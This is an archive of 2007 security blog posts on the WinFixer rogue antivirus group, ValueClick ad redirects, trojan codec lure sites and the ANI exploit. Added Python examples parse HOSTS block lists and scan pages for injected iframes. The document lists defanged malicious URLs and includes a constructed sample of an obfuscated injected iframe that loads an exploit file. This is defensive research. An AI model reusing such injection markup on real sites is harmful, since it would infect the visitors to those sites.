April 2007 - Posts

Microsoft releases Security Intelligence Report

Microsoft Security Intelligence Report (July – December 2006)
Overview: An in-depth perspective of software vulnerabilities, malicious code threats, and potentially unwanted software, focusing on the second half of 2006.

What I found interesting in their research is that the WinFixer group is listed twice in the top six rogue security products.

Ever wonder why you never see any of the WinFixer products listed in legitimate reviews? Looking at the StopBadware report should be enough to convince anyone ...

We find that WinAntiVirus 2006 (Unregistered Version) is badware because it makes exaggerated claims of system vulnerability in order to encourage the user to purchase the full version. In essence, WinAntiVirus 2006 (Unregistered Version) belongs to that subset of badware that is often termed "nagware" or "extortionware" -- that is, software that exists solely to encourage (generally through deceptive or annoying means) users to upgrade to a full version of the product. In addition, WinAntiVirus 2006 (Unregistered Version) automatically disables Windows Firewall without notifying the user. It also fails to disclose to the user that the program will run automatically at start-up, continuously run a process in the background, or download updates without user consent.

Wikipedia says: "WinSoftware Ltd is a company that develops fake security software" ... these examples and the others I've blogged about previously leave no doubt about the types of products and tactics they use to dupe the unsuspecting user.

However, we still find ValueClick involved ... getting a commission on the sale of these rogue products ...

hxxp://go.winantispyware.com/NTY2Mg==/2/3345/ax=1/ed=1/ex=1/af6/
redirects to: (URLs disabled - view safely here)
hxxp://adfarm.mediaplex.com/ad/ck/45682?mpt=1177485361&aid=swp_was7&lid=3345&affid=pp_669127382&p=was&ed=1&ex=1

Since ValueClick is a publicly traded company (NASDAQ: VCLK), perhaps someone should inform the stockholders of just how their money is generated (hard-core adult sites - depicted images of underage boys). No doubt an FTC investigation would result in a drop in the stock price, and the shareholders would want to know why ...

Posted by winhelp2002 with no comments

WinFixer and ValueClick in the UK

Browsing to winfixer.co.uk we find yet another connection between WinFixer and ValueClick. As you can see, clicking the "Download Now" button routes you through "adfarm.mediaplex.com" (ValueClick).

Once you click the button you end up on a (secure HTTPS) site where, as you can see, ValueClick supplies a WebBug (1x1 hidden image) to obtain a commission from the user (choke) purchasing this highly suspect bundle ...

Notice the TRUSTe symbol (highlighted) ... is WinFixer really a member? ... well, I searched and searched and I could not find WinFixer or any of its other related sites listed anywhere. Are users being scammed? It appears that ValueClick is willing to associate itself with the WinFixer group at any cost ...

Posted by winhelp2002 with 2 comment(s)

More on WinFixer and ValueClick

Landing on "gaylovetwinks(dot)com" we find yet another adult site that generates its revenue from linking to known Trojan.Codec sites. What is disturbing is that again we find the WinFixer gang (warning banner for the go.sexprofit link) involved with this type of activity.

What's even worse ... when the McAfee SiteAdvisor bot scanned the same site we find another connection between WinFixer (drivecleaner and winantispyware) and ValueClick (mediaplex.com) ... so there is no doubt ValueClick has associated itself with some rather dubious characters ...

Given the nature of the above depicted images of underage boys, it really makes you wonder what ValueClick is thinking. Are things so bad that (supposedly) mainstream advertisers need to generate revenue this way?

Posted by winhelp2002 with 2 comment(s)

More on WinFixer

Following a tip from one of my fellow security researchers ... winpornvids(dot)com

This is yet another Trojan.Codec site where, on clicking an image, the viewer is presented with the bogus message "Windows Media Player is unable to play movie file." While this is nothing new, what I find interesting is that here again we find the WinFixer gang (go.drivecleaner link) involved with known malicious sites whose only purpose is to generate revenue by infecting the viewer.

I blogged the other day about the connection between ValueClick and the WinFixer gang. Hey ValueClick, is this the type of activity you really want to be associated with?

I highlighted in red several of the actual links (already listed in my HOSTS file) that lead to the Trojan.Codec infection ... do not visit them! You can view safely here instead.

Posted by winhelp2002 with 1 comment(s)

Are Advertisers promoting Malware?

I was going to blog about another Trojan.Codec site I found, but truthfully this is getting boring ... instead I thought I'd do a follow-up on something I saw on Sunbelt's blog ...

Looking at the image Sunbelt provided I saw oemtop(dot)com at the bottom. Now this is yet another "Google Warning" site ... so do not visit there, as there are multiple exploits on this Warez-type site. In the image below you can see the cast of characters involved ...

What I find disturbing is this: notice the two "CONNECT softwareprofit.com" entries? This is part of the WinFixer group ... nice place to advertise your products, a Warez-type site that will infect your machine if you do not have the latest Windows updates, etc. ... Now if you follow those connections:

hxxp://go.errorsafe.com/MTIxNjU=/2/3891// it redirects to the following:
hxxp://adfarm.mediaplex.com/ad/ck/45684?mpt=1177051780&aid=swp_ers&lid=3891&affid=pp_2296726171&p=ers&
(view safely here)

And another hxxp://go.winantivirus.com/MTM4MTM=/2/3891// that redirects to:
hxxp://adfarm.mediaplex.com/ad/ck/45678?mpt=1177052230&aid=swp_wa7p&lid=3891&affid=pp_2642226173&
(view safely here)

So here again we have "adfarm.mediaplex.com" involved with the WinFixer gang ... Sandi and others have exposed this ValueClick ad server before, yet they have not changed their ways, suggesting that the $$$ is all they are after, even at the expense of their reputation.

Another exploit on the site is "vevdqimkcm(dot)info" (Trojan.PWS.Tanspy), which is already included in the HOSTS file, so a word to the wise ... stay far away from these Warez-type sites!

You know, I'm often asked why I block these ad servers ... "you may be blocking revenue from that site" ... well, as you can see, a huge majority of these ad servers are involved in very questionable tactics.
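An added example, not code from the post or from the MVPS HOSTS project, showing how a practitioner would work through a redirect chain like the two above: parse a HOSTS file in the MVPS layout, walk the captured chain and report which hop the HOSTS file would have stopped, decode the base64 first path segment of the go.* link (MTIxNjU= decodes to the digits 12165, MTM4MTM= to 13813), and check whether the ad server's lid parameter echoes the numeric path segment of the entry link. The HOSTS excerpt is constructed, the query parameter names are the ones in the URLs above, and reading mpt as a Unix timestamp is an assumption (the values in this post do land in April 2007).

```python
import base64
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed excerpt in the MVPS HOSTS file layout (sinkhole address, hostname,
# optional "# [comment]"). Not the contents of the real file.
SAMPLE_HOSTS = """\
# This MVPS HOSTS file is a free download from http://winhelp2002.mvps.org/
127.0.0.1  localhost
127.0.0.1  adfarm.mediaplex.com   # [ValueClick]
127.0.0.1  go.errorsafe.com
127.0.0.1  go.winantivirus.com
127.0.0.1  softwareprofit.com
0.0.0.0  vevdqimkcm.info
"""


def parse_hosts(text):
    """Return the set of hostnames a HOSTS file points at a sinkhole address.

    Both 127.0.0.1 and 0.0.0.0 are treated as sinkholes; 'localhost' is skipped so
    the loopback entry is never reported as a block."""
    blocked = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing "# [comment]"
        if not line:
            continue
        addr, *names = line.split()
        if addr in ("127.0.0.1", "0.0.0.0"):
            blocked.update(n.lower() for n in names if n.lower() != "localhost")
    return blocked


def hostname(url):
    """Hostname of a URL; defanged 'hxxp' schemes are accepted as-is."""
    return (urlsplit(url).hostname or "").lower()


def decode_affiliate_path(url):
    """The go.<product>.com links carry a base64 segment first in the path
    (e.g. MTIxNjU= decodes to '12165') followed by plain segments.
    Returns (decoded_first_segment, remaining_segments)."""
    segments = [s for s in urlsplit(url).path.split("/") if s]
    first = segments[0]
    padded = first + "=" * (-len(first) % 4)      # tolerate stripped padding
    decoded = base64.b64decode(padded).decode("ascii", errors="replace")
    return decoded, segments[1:]


def ad_server_params(url):
    """Flatten the ad server's query string (first value per key)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def analyze_chain(chain, blocked):
    """Summarise a captured redirect chain: which hop the HOSTS file would have
    stopped, the id carried in the entry path, and whether the ad server's
    lid/affid parameters echo it (i.e. the click is attributed to a specific
    affiliate placement)."""
    hops = [{"host": hostname(u), "blocked": hostname(u) in blocked} for u in chain]
    entry_id, entry_segments = decode_affiliate_path(chain[0])
    params = ad_server_params(chain[-1])
    report = {
        "hops": hops,
        "first_blocked_hop": next((i for i, h in enumerate(hops) if h["blocked"]), None),
        "entry_id": entry_id,
        "lid_echoes_entry_path": params.get("lid") in entry_segments,
        "affid": params.get("affid"),
    }
    # Assumption: 'mpt' is a Unix timestamp; render it so the capture can be dated.
    if params.get("mpt", "").isdigit():
        ts = datetime.fromtimestamp(int(params["mpt"]), tz=timezone.utc)
        report["mpt_as_utc"] = ts.strftime("%Y-%m-%d %H:%M:%SZ")
    return report


# The two chains from the post, kept defanged exactly as written there.
CHAINS = [
    ["hxxp://go.errorsafe.com/MTIxNjU=/2/3891//",
     "hxxp://adfarm.mediaplex.com/ad/ck/45684?mpt=1177051780&aid=swp_ers&lid=3891&affid=pp_2296726171&p=ers&"],
    ["hxxp://go.winantivirus.com/MTM4MTM=/2/3891//",
     "hxxp://adfarm.mediaplex.com/ad/ck/45678?mpt=1177052230&aid=swp_wa7p&lid=3891&affid=pp_2642226173&"],
]

if __name__ == "__main__":
    blocked = parse_hosts(SAMPLE_HOSTS)
    for chain in CHAINS:
        print(analyze_chain(chain, blocked))
```

Run as a script it prints one report per chain. The same functions take the text version of the real HOSTS file and any chain captured from a proxy or the browser's network log, which is the quickest way to answer "would my HOSTS file have stopped this?" for a link someone sends in.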

Posted by winhelp2002 with 2 comment(s)

Yet Another bogus Image ActiveX Object Error

Landing on freeimageheaven(dot)com the visitor is presented with the following ... (bogus error)

This is another one of these sites that trap the visitor ... no matter which button you click, you cannot get out. If you click OK you are presented with a Trojan.Zlob file from imagemediasource(dot)com. However, you can close the browser via Alt-F4.

Interestingly, this site was only registered 3 days ago ... doesn't take them long, does it?

Posted by winhelp2002 with no comments

HOSTS File Update 04-08-07

The MVPS HOSTS file was recently updated [04-08-07]
http://www.mvps.org/winhelp2002/hosts.htm

Download: hosts.zip (133 kb)
http://www.mvps.org/winhelp2002/hosts.zip

How To: Download and Extract the HOSTS file
http://www.mvps.org/winhelp2002/hosts2.htm

HOSTS File - Frequently Asked Questions
http://www.mvps.org/winhelp2002/hostsfaq.htm

Note: the "text" version makes a great resource
for determining possible culprits ... (555 kb)
http://www.mvps.org/winhelp2002/hosts.txt

Sign up for HOSTS file update notices
http://www.mvps.org/winhelp2002/hosts.htm#contribute

Posted by winhelp2002 with no comments

Patch available for the ANI exploit

Everyone should make sure they have patched their system against this very nasty exploit!

The ANI exploit (Vulnerability in Windows Animated Cursor Handling, fixed by the MS07-017 update) is still live in many places, either by design or via a hacked site. Working on a tip from Kat H about hornys-place(dot)com, I found Google has already placed a warning about this site, which has most likely been hacked by several culprits.

Upon visiting the site ... well, you can see that IE7 (patched) blocks the exploit and prompts the user; NOD32 also jumps on the page (Win32/TrojanDownloader.Ani.Gen).

But if you look closer you'll see the exploit is not really from the visited site ... it's from a JavaScript injected into the bottom of the page, along with two other IFrame exploits! ... ouch! Now the sites I circled in red were already included in the HOSTS file. The JavaScript decodes to a page on codecsoft(dot)net.

As I mentioned above, even legit sites have been hacked and these types of exploits injected. A good example of this is a site Sandi blogged about on April 4th, and it is still hacked! ... Unbelievable, because this is a major hardware (motherboard) site ... asus(dot)com(dot)tw ... looks like their IT/Security people are (still) not very aware of what is going on!
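An added example, not code from the post or from any tool it mentions, covering both the injected-script-plus-IFrames pattern in this post and the 1x1 WebBug from the winfixer.co.uk post: it parses a page, flags hidden or third-party iframes, third-party 1x1 images and third-party scripts, and percent-decodes any unescape('...') payload found in an inline script so that an iframe the browser would only create at run time is scanned too. The sample page, its domains (RFC 2606 .example names) and the document.write(unescape(...)) payload are constructed for the example; that specific obfuscation form is assumed, and a real injected script may need a different decoder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed page. The document proper ends at </html>; the material after it is
# the injected block described in the post (two hidden iframes plus a script that
# document.write()s an unescape()d iframe). The body also carries a 1x1 third-party
# image, the "web bug" pattern. All domains are RFC 2606 placeholders.
SAMPLE_PAGE = """<html><head><title>Welcome</title></head>
<body>
<p>Product catalogue</p>
<img src="http://www.site.example/logo.gif" width="120" height="40">
<img src="http://tracker.example/pixel.gif" width="1" height="1">
<script src="http://www.site.example/js/menu.js"></script>
</body></html>
<iframe src="http://ifr-one.example/in.cgi?3" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="http://ifr-two.example/load.php" width=0 height=0></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fdecoded.example%2Fx.ani%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));</script>
"""

# Matches unescape('...') / unescape("...") and captures the percent-encoded payload.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)


class TagCollector(HTMLParser):
    """Collect iframe/img elements and script elements (with inline text) in document order."""

    def __init__(self):
        super().__init__()
        self.items = []              # (tag, attrs, inline_text)
        self._script = None          # (attrs, [text chunks]) while inside <script>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("iframe", "img"):
            self.items.append((tag, attrs, ""))
        elif tag == "script":
            self._script = (attrs, [])

    def handle_data(self, data):
        if self._script is not None:
            self._script[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            attrs, chunks = self._script
            self.items.append(("script", attrs, "".join(chunks)))
            self._script = None


def is_hidden(attrs):
    """1x1 / 0x0 dimensions or a hiding style: the element is not meant to be seen."""
    def tiny(v):
        return v is not None and v.strip().lower().rstrip("px").strip() in ("0", "1")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def host_of(url):
    return (urlsplit(url or "").hostname or "").lower()


def scan_markup(markup, page_host, origin="page"):
    """Flag third-party scripts, hidden or third-party iframes, and third-party 1x1
    images. Any unescape('...') payload inside an inline script is percent-decoded
    and scanned recursively, because the injected script only becomes an iframe
    once the browser runs it."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    findings = []
    for tag, attrs, text in parser.items:
        host = host_of(attrs.get("src"))
        third_party = bool(host) and host != page_host
        hidden = is_hidden(attrs)
        if tag == "iframe" and (hidden or third_party):
            findings.append({"kind": "iframe", "host": host, "hidden": hidden, "origin": origin})
        elif tag == "img" and hidden and third_party:
            findings.append({"kind": "web-bug", "host": host, "hidden": True, "origin": origin})
        elif tag == "script":
            if third_party:
                findings.append({"kind": "script", "host": host, "hidden": False, "origin": origin})
            for m in UNESCAPE_RE.finditer(text):
                findings.extend(scan_markup(unquote(m.group(2)), page_host, origin + ">unescape"))
    return findings


def hosts_to_block(findings):
    """Hostnames that would become HOSTS file entries."""
    return sorted({f["host"] for f in findings if f["host"]})


if __name__ == "__main__":
    found = scan_markup(SAMPLE_PAGE, "www.site.example")
    for f in found:
        print(f)
    print(hosts_to_block(found))
```

The origin field tells you whether a hit was visible in the saved HTML or only appeared after decoding, which is exactly the distinction the post draws between the visited site and the script injected into it. Feed it a page saved from the browser (not fetched live) and the page's own hostname; anything it returns is a candidate for the HOSTS file or for a question to the site's owner.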

Posted by winhelp2002 with no comments